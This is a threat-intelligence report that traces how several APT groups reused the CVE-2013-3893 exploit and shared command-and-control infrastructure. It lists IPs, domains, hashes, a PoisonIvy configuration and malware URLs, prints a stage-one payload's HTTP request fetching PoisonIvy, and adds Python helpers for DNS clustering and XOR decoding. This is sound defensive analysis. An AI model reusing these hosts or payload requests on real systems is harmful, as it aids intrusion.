Hand Me Downs: Exploit and Infrastructure Reuse Among APT Campaigns

Since we first reported on Operation DeputyDog, at least three other
Advanced Persistent Threat (APT) campaigns, known as Web2Crew, Taidoor,
and th3bug, have made use of the same exploit to deliver their own
payloads to their own targets. It is not uncommon for APT groups to
hand off exploits to others who are lower on the zero-day food chain,
especially after the exploit becomes publicly available. Thus, while
the exploit may be the same, the APT groups using it are not otherwise
related.

In addition, APT campaigns may reuse existing infrastructure for new
attacks. There have been reports that the use of CVE-2013-3893 may
have begun in July; however, this determination appears to be based
solely on the fact that the CnC infrastructure used in DeputyDog had
been previously used by the attackers. We have found no indication
that the attackers used CVE-2013-3893 prior to August 23, 2013.

Exploit Reuse

Since the use of CVE-2013-3893 in Operation DeputyDog (which we can
confirm happened by at least August 23, 2013), the same exploit has
been used by different threat actors.

Web2Crew

On September 25, 2013, an actor we call Web2Crew utilized
CVE-2013-3893 to drop PoisonIvy (not DeputyDog malware). The
exploit was hosted on a server in Taiwan (220.229.238.123) and dropped
a PoisonIvy payload (38db830da02df9cf1e467be0d5d9216b) hosted on the
same server. In our recent paper, we document how to extract
intelligence from Poison Ivy that can be used to cluster activity.

The Poison Ivy binary used in this attack was configured with the
following properties:

  ID: gua925
  Group: gua925
  DNS/Port: Direct: login.momoshop.org:443, Direct: 210.17.236.29:443
  Proxy DNS/Port: (none)
  Proxy Hijack: No
  ActiveX Startup Key: (none)
  HKLM Startup Entry: (none)
  File Name: (none)
  Install Path: C:\Documents and Settings\Administrator\Desktop\runrun.exe
  Keylog Path: C:\Documents and Settings\Administrator\Desktop\runrun
  Inject: No
  Process Mutex: ;A>6gi3lW
  Key Logger Mutex: (none)
  ActiveX Startup: No
  HKLM Startup: No
  Copy To: No
  Melt: No
  Persistence: No
  Keylogger: No
  Password: LostC0ntrol2013~2014

This configuration matches other Web2Crew samples, particularly the
‘gua25’ ID. Some previous Web2Crew Poison Ivy samples have been
configured with similar IDs, including:

  920GUA
  GUA4.11
  GUA
  GUA3.7
  GUA613

Additionally, the IP address 210.17.236.29 was used to host the
command and control server in this attack. A number of known Web2Crew
domains previously resolved to this same IP address between August 15
and August 29.

  DATE        DOMAIN
  2013-08-15  flash.wordpreass.net
  2013-08-15  search.blogspoct.us
  2013-08-15  account.twiitter.us
  2013-08-15  search.twiitter.biz
  2013-08-15  video.twiitter.biz
  2013-08-15  domain.blogspoct.us
  2013-08-15  search.wikiipedia.us
  2013-08-15  search.youetube.us
  2013-08-16  account.twiitter.us
  2013-08-16  video.twiitter.biz
  2013-08-16  domain.blogspoct.us
  2013-08-16  search.blogspoct.us
  2013-08-16  search.twiitter.biz
  2013-08-21  search.youetube.us
  2013-08-29  login.twiitter.us
  2013-08-29  account.youetube.us

We observed the Web2Crew actor targeting a financial institution in
this attack as well as in previous attacks.
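The infrastructure overlap argued above (the September 25 PoisonIvy C2 sharing an IP with earlier Web2Crew domains) can be reproduced as a small passive DNS clustering step. This is an added example, not code from the original post or from FireEye; the records are a subset of the table above plus one constructed entry that pairs the Taidoor C2 names from later in the post, and the helper names are our own.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

# (first seen, domain, resolving IP). The 210.17.236.29 rows are taken from
# the post's table; the final two rows are constructed for this example.
PDNS_RECORDS: List[Tuple[str, str, str]] = [
    ("2013-08-15", "flash.wordpreass.net", "210.17.236.29"),
    ("2013-08-15", "search.blogspoct.us", "210.17.236.29"),
    ("2013-08-15", "account.twiitter.us", "210.17.236.29"),
    ("2013-08-16", "video.twiitter.biz", "210.17.236.29"),
    ("2013-08-21", "search.youetube.us", "210.17.236.29"),
    ("2013-08-29", "login.twiitter.us", "210.17.236.29"),
    # PoisonIvy direct C2 from the September 25 attack (constructed pairing
    # of the domain and IP that the config lists as separate entries)
    ("2013-09-25", "login.momoshop.org", "210.17.236.29"),
    # Constructed pairing of the Taidoor C2 names: a separate cluster
    ("2013-09-26", "msdn.techsofts.com", "203.114.64.202"),
]


def cluster_by_ip(records: List[Tuple[str, str, str]]) -> Dict[str, dict]:
    """Group domains by resolving IP and track the first/last seen dates.

    ISO-8601 dates compare correctly as strings, so min/max is enough.
    """
    clusters: Dict[str, dict] = defaultdict(
        lambda: {"domains": set(), "first": None, "last": None}
    )
    for date, domain, ip in records:
        c = clusters[ip]
        c["domains"].add(domain)
        c["first"] = date if c["first"] is None else min(c["first"], date)
        c["last"] = date if c["last"] is None else max(c["last"], date)
    return dict(clusters)


def overlapping_domains(records: List[Tuple[str, str, str]], domain: str) -> List[str]:
    """Domains that shared at least one resolving IP with `domain`."""
    by_ip = cluster_by_ip(records)
    ips = {ip for _, d, ip in records if d == domain}
    related = set()
    for ip in ips:
        related |= by_ip[ip]["domains"] - {domain}
    return sorted(related)


if __name__ == "__main__":
    for ip, c in cluster_by_ip(PDNS_RECORDS).items():
        print(ip, c["first"], c["last"], sorted(c["domains"]))
    print(overlapping_domains(PDNS_RECORDS, "login.momoshop.org"))
```
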

Taidoor

The same exploit (CVE-2013-3893) has also been used by another,
separate APT campaign. By at least September 26, 2013, a compromised
Taiwanese Government website was used to host the same exploit;
however, the payload in this case was Taidoor (not DeputyDog malware).
The decoded payload has an MD5 of 666603bd2073396b7545d8166d862396.
The CnC servers are msdn.techsofts.com and 203.114.64.202.

We found another instance of CVE-2013-3893 hosted at
www.atmovies[.]com[.]tw/home/temp1.html. This dropped another Taidoor
binary with the MD5 of 1b03e3de1ef3e7135fbf9d5ce7e7ccf6. This Taidoor
sample connected to a command and control server at 121.254.176.151.
We found this sample targeting the same financial services firm
targeted by the Web2Crew actor discussed above.

Both of these samples were the newer versions of Taidoor that we
previously described here.

Th3Bug

The actor we refer to as ‘th3bug’ also used CVE-2013-3893 in multiple
attacks. Beginning on September 27, compromised websites hosting the
Internet Explorer zero-day redirected victims to download a stage one
payload (496171867521908540a26dc81b969266) from
www.jessearch[.]com/dev/js/27.exe. This payload was XOR’ed with a
single-byte key of 0x95.
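Recovering a stage one payload obfuscated this way is a routine analysis step: XOR with a single byte is its own inverse, and the key can be confirmed by checking that the result looks like a Windows executable. The block below is an added example, not code from the original post; the PE bytes are constructed (not the real 27.exe), and the 256-key search is a generic check rather than anything specific to th3bug.

```python
from typing import Optional

MZ_MAGIC = b"MZ"
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob: bytes) -> Optional[int]:
    """Try all 256 single-byte keys and return the one yielding a plausible PE.

    Requiring both the 'MZ' magic and the DOS stub string keeps false
    positives out: the magic alone only constrains the first two bytes.
    Only the first 512 bytes are examined, which is where both markers live.
    """
    head = blob[:512]
    for key in range(256):
        candidate = xor_single_byte(head, key)
        if candidate.startswith(MZ_MAGIC) and DOS_STUB in candidate:
            return key
    return None


def decode_stage_one(blob: bytes) -> Optional[bytes]:
    """Return the deobfuscated payload, or None if no key fits."""
    key = recover_xor_key(blob)
    return None if key is None else xor_single_byte(blob, key)


# Constructed stand-in for a PE header: MZ magic, padding, then the DOS stub.
# This is sample data for the example, not bytes from any real sample.
FAKE_PE = MZ_MAGIC + b"\x90\x00\x03\x00" + b"\x00" * 58 + DOS_STUB + b".\r\n$"
OBFUSCATED = xor_single_byte(FAKE_PE, 0x95)  # same scheme as the post describes


if __name__ == "__main__":
    key = recover_xor_key(OBFUSCATED)
    print(f"recovered key: {key:#04x}")
    print(decode_stage_one(OBFUSCATED)[:48])
```
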

The stage 1 payload then downloaded a PoisonIvy payload (not DeputyDog
malware) via the following request:

  GET /dev/js/heap.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible)
  Host: www.jessearch.com
  Cache-Control: no-cache

The PoisonIvy payload then connected to a command and control server
at mm.tc.epac.to.

The deobfuscated stage 1 payload has a MD5 of
4017d0baa83c63ceff87cf634890a33f and was compiled on September 27,
2013. This may indicate that the th3bug actor also customized the IE
zero-day exploit code on September 27, 2013 – well after the actors
responsible for the DeputyDog malware weaponized the same exploit.

Infrastructure Reuse

APT groups also reuse CnC infrastructure. It is not uncommon to see a
payload call back to the same CnC even though it has been distributed
via different means. For example, although the first reported use of
CVE-2013-3893 in Operation DeputyDog was August 23, 2013, the CnC
infrastructure had been used in earlier campaigns.

Specifically, one of the reported DeputyDog command and control
servers, located at 180.150.228.102, had been used in a previous attack
in July 2013. During this previous attack, likely executed by the same
actor responsible for the DeputyDog campaign, the 180.150.228.102 IP
hosted a PoisonIvy control server and was used to target a gaming
company as well as a high-tech manufacturing company. There is no
evidence to suggest that this July attack using Poison Ivy leveraged
the same CVE-2013-3893 exploit.

We also observed usage of Trojan.APT.DeputyDog malware as early as
March 26, 2013. In this attack, a Trojan.APT.DeputyDog binary
(b1634ce7e8928dfdc3b3ada3ab828e84) was deployed against targets in
both the high-technology manufacturing and finance verticals. This
DeputyDog binary called back to a command and control server at
www.jusched.net. There is also no evidence in this case to suggest
that this attack used the CVE-2013-3893 exploit.

This malware family and the CnC infrastructure are part of an ongoing
campaign. Therefore, the fact that this infrastructure was active
prior to the first reported use of CVE-2013-3893 does not necessarily
indicate that this particular exploit was previously used. The actor
responsible for the DeputyDog campaign employs multiple malware tools
and utilizes a diverse command and control infrastructure.

Conclusion

The activity associated with specific APT campaigns can be clustered
and tracked by unique indicators. There are a variety of different
campaigns that sometimes make use of the same malware (or sometimes
widely available malware such as PoisonIvy) and the same exploits. It
is not uncommon for zero-day exploits to be handed down to additional
APT campaigns after they have already been used.

  • The first observed usage of CVE-2013-3893, in Operation DeputyDog,
    remains August 23, 2013. However, the C2 infrastructure had been
    used in previous attacks in July 2013.
  • CVE-2013-3893 has subsequently been used by at least three other
    APT campaigns: Taidoor, th3bug, and Web2Crew. However, other than
    the common use of the same exploit, these campaigns are otherwise
    unrelated.
  • We expect that CVE-2013-3893 will continue to be handed down to
    additional APT campaigns and may eventually find its way into the
    cyber-crime underground.
